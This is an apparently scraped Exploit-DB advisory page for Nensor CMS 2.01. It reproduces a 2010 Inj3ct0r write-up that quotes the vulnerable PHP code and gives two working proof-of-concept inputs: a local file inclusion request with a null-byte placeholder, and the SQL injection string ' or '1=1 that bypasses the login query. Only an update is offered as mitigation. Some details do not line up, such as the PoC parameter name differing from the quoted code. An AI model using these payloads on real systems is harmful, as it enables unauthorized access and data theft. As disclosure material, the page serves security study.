Nensor CMS 2.01 Multiple Remote Vulnerabilities

vendor:

Nensor CMS

by:

cr4wl3r

7,5

CVSS

HIGH

LFI and Auth Bypass

22, 287

CWE

Product Name: Nensor CMS

Affected Version From: 2.01

Affected Version To: 2.01

Patch Exists: YES

Related CWE: N/A

CPE: a:nensor:nensor_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Nensor CMS 2.01 Multiple Remote Vulnerabilities

Nensor CMS 2.01 is vulnerable to Local File Inclusion and Authentication Bypass. An attacker can exploit these vulnerabilities to gain access to sensitive information and execute arbitrary code on the server.

Mitigation:

Update to the latest version of Nensor CMS

Source

Exploit-DB raw data:

===============================================
Nensor CMS 2.01 Multiple Remote Vulnerabilities
===============================================

[+] Nensor CMS 2.01 Multiple Remote Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original : http://inj3ct0r.com/exploits/11346
[+] Download: http://code.google.com/p/nensor-cms/downloads/list

[x] LFI:

$sPage=(isset($_GET["page"]))?$_GET["page"]:"";

if(is_file("".$sPage.".php")){
 include "".$sPage.".php";
}elseif(is_file("".$sPage.".js")){
 include "".$sPage.".js";
}

[x] LFI PoC: [payh]/x/modules/javascript.php?sPage=[LFI%00]

[x] Auth Bypass:

$sql = "SELECT iKey,sUsername,iKeyGroup,bForumAdmin,sLanguage,sPassword,sMail,sType
    FROM tb_users
    WHERE sUsername='".strInput($_POST["sUsername"])."'
    AND sPassword='".md5($_POST["sPassword"])."'
    AND bActive=1";

[x] PoC: ' or '1=1


# Inj3ct0r.com [2010-03-18]